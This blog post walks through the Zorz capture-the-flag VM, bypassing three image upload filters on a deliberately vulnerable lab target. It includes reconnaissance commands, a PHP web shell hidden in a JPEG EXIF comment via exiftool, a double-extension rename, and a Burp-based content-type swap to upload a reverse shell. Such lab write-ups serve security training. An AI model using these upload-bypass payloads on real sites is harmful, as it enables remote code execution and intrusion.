[Hacking series] – TopHatSec:Zorz

Written by  on May 31, 2015 

Code name: Zorz

Webpage: http://www.top-hat-sec.com/r4v3ns-blog/another-vm-challenge-zorz

VM Download: http://download.vulnhub.com/tophatsec/Zorz.ova

Challange: Bypass all 3 image uploaders

After making sure that Zorz is running under our virtualbox, we proced by running netdiscover as usual.

1

As our target is running under VirtualBox, it’s MAC address vendor is cadmus computer systems. Now we can run nmap

# nmap -Pn -A -p- 192.168.11.8

2

Port 80 open as expected, time to put that address on the browser and start the show.

3

Once we enter the site, a simple image uploader appears. This will be our first “challange”. Our goal is to upload an evil php file. So why don’t just select an evil php file on the browser and directly upload it to the server?

4

Lelz. File uploaded, so damn easy. But now, where is the file? After uploading the php shell, what we have to do is search for the “uploads” directory. We can start by using nikto.

# nikto -h http://192.168.11.8

nikto

Uh, nothing new, except from phpmyadmin(our goal is to pwn nothing more but the uploaders). We can try dirbuster search for hidden dirs

# dirbuster

5

jackpot! uploads1, uploads2 and uploads3. Using logic, our baby must be in the first directory.

6

Here it is, let’s run it

7

Everything is working there. Let’s go for the second challange

The second uploader looks just like the first, but there are a few things that work a little bit diferent here. We can see what happens if we try the same trick we did in the first uploader

8

What if we change the file extension?

9

uh..

10

Nothing. Well, for the next trick we will need a simple jpeg image. I can create it with gimp

11

What we will do now, is edit the “Comment” field in the exif data of the image, we will put some evil php code there, exiftool will do the work.

# exiftool -Comment='<?php echo “<pre>”; system($_GET[‘cmd’]); ?>’ 3.jpg

12

Now we can change the extension of that image to .php.jpg

# cp 3.jpg 3.php.jpg

Meanwhile on the web browser…

13

pwned. Challange 2 completed, only the 3rd uploader remains.

14

Simple php&jquery uploader. Let’s try a different trick on this one.

15

What we done here is use the burp suite to change the content type and the filename on the fly, and introduce our php-reverse-shell on the system.

The result has been great, as expected

16

And then

17

Game over Zorz P-)

Category : hacking series

Leave a Reply

Your email address will not be published. Required fields are marked *